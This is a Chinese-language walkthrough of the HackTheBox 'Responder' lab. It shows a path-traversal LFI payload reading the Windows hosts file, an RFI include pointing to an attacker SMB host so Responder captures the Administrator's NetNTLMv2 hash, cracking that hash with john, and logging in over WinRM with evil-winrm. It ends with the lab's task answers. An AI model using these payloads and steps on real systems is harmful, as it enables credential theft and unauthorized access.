HackTheBox-Responder

初始点1级第四关Responder

获取目标IP。

执行以下命令，扫描目标IP。

nmap -p- --min-rate=1000 -sV {target_IP}
-p- 扫描所有端口
--min-rate 指定nmap每秒发送的最小数据包数量，数字越大，速度越快
-sV 探测开放端口以确定服务/版本信息

扫描发现80和5985端口开放，5989端口为winrm远程管理协议，如果有远程管理权限的账号密码，即可获取目标机shell。

浏览器访问目标机IP。

http://{target_IP}

没有找到，而且url显示跳转到unika.htb，考虑是该IP绑定了多个域名，我们需要在/etc/hosts文件中添加该域名，让浏览器正常解析unika.htb的地址。

vim /etc/hosts

查看该网页后没有发现可利用功能，不过导航栏的语言选择功能，点击后url显示page参数=german.html

如果页面输入未经过滤，可能存在文件包含漏洞。

LFI本地文件包含，指包含本地文件并且可以执行。

RFI远程文件包含，指包含远程服务器上的文件并且可以执行。

我们测试WindowsSystem32driversetchosts文件（主机名本地转换为IP），windows系统测试LFI较常用。

../一次遍历一层目录，使用多个../遍历到基本目录C:

page=../../../../../../../../../../windows/system32/drivers/etc/hosts

响应内容，则可能存在LFI。

在php配置文件php.ini中，allow_url_include设置为off，表示php不会远程加载http或ftp url，防止文件包含漏洞攻击，但不会阻止加载smb url，可以利用此功能获取HTLM哈希。

这里我们使用Responder，它会设置一个恶意的smb服务器，当目标机对服务器进行HTLM验证时，服务器生成Challenge发回客户端，客户端使用用户的密码hash对Challenge加密，当服务器响应时，Responder会使用Challenge加密响应来生成NetNTLMv2。

1、查看responder.conf是否监听smb请求。

Responder.conf ⽂件的位置：

默认系统安装：/usr/share/responder/Responder.conf

github 安装：/installation_directory/Responder.conf

cat responder.conf

2、python3启动responder，-i指定网络接口，网络接口可用ifconfig命令查看。

python3 responder.py -I tun0

3、浏览器访问以下地址，IP用我们攻击机的IP。

http://unika.htb/?page=//x.x.x.x/somefile

返回错误。

但responder监听时，发现一个用于管理员用户的NetNTLMv。

4、我们把哈希值保存下来用john进行破解。

echo Administrator::RESPONDER:ab24604971e51881:4C1A046B103E5384F93217C5B020E0BB:010100000000000000CBC550A565DA014BB09ADED206C7FF00000000020008004D004B003200540001001E00570049004E002D004200590054004900580051004A004A0046004500320004003400570049004E002D004200590054004900580051004A004A004600450032002E004D004B00320054002E004C004F00430041004C00030014004D004B00320054002E004C004F00430041004C00050014004D004B00320054002E004C004F00430041004C000700080000CBC550A565DA0106000400020000000800300030000000000000000100000000200000A79D13C226EFC2523C87C6EAD596B381E9B8657B19F4AB5E7CE2842B266222910A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100390038000000000000000000 > hash.txt

john -w=/usr/share/wordlists/rockyou.txt hash.txt
-w：指定破解哈希值用的字典

密码：badminton

连接到目标机WinRM服务，使用evil-winrm。

evil-winrm -i x.x.x.x -u administrator -p badminton

连接成功。最后在C:usersmikeDesktop找到flag.txt。

type查看flag值。

Responder任务

任务1

问：当使用 IP 地址访问 Web 服务时，我们被重定向到的域是什么？

答：unika.htb

任务2

问：服务器上使用哪种脚本语言来生成网页？

答：php

任务3

问：用于加载不同语言版本网页的 URL 参数名称是什么？

答：page

任务4

问：以下哪个“page”参数值是利用本地文件包含 (LFI) 漏洞的示例：“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”，“minikatz.exe”

答：../../../../../../../../windows/system32/drivers/etc/hosts

任务5

问：以下哪个“page”参数值是利用远程文件包含 (RFI) 漏洞的示例：“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”，“minikatz.exe”

答：//10.10.14.6/somefile

任务6

问：NTLM 代表什么？

答：New Technology LAN Manager

任务7

问：我们在 Responder 实用程序中使用哪个标志来指定网络接口？

答：-I

任务8

问：有多种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码，以查看其中是否有任何密码生成相同的响应。此类工具通常被称为“john”，但全名是什么？

答：john the ripper

任务9

问：管理员用户的密码是什么？

答：badminton

任务10

问：我们将使用 Windows 服务（即在机器上运行）使用我们恢复的密码远程访问 Responder 计算机。它监听哪个端口的 TCP？

答：5985

任务11

提交flag。

总结

当事情不景气时，继续前进、坚持不懈是至关重要的。